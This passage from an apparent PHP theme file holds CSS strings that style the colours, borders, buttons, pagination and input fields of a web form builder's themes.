!important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#ffffff !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#A31919 !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#A31919 !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color: #F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\npadding: 0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#3D9EBE;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #999;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nmargin:5px 7px;\r\nborder:1px solid #999;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "14" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:transparent !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_select select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.time_box\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#ffffff !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nheight:18px !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\ncolor:#000 !important;\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #000 !important;\nbackground-color:transparent !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.other_input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:transparent !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\n	font-family: ''Times New Roman'' !important;\nmargin:0px -30px 0px 0px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\n	font-family: ''Times New Roman'' !important;\ncolor:#000 !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #ffffff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#000000;\r\nborder:1px solid #000000;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #734C00;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#282828 !important;\r\nborder:1px solid #000000;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#282828;\r\nborder:1px solid #000000;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #000000;\r\nborder-radius:0px !important;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#282828;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#282828;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #000000;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #000000;\r\n\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground-color:#FFFFFF;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #000000;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#000000;\r\nmargin: 2px 5px 3px 0 !important;\r\nborder:1px solid #000000;\r\n}\r\n\r\n.wdform_matrix table input:focus, .wdform_matrix table select:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #734C00;\r\n}",
      "15" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#AB0101 !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_date_fields select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_date_fields input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_select select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.time_box\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:20px 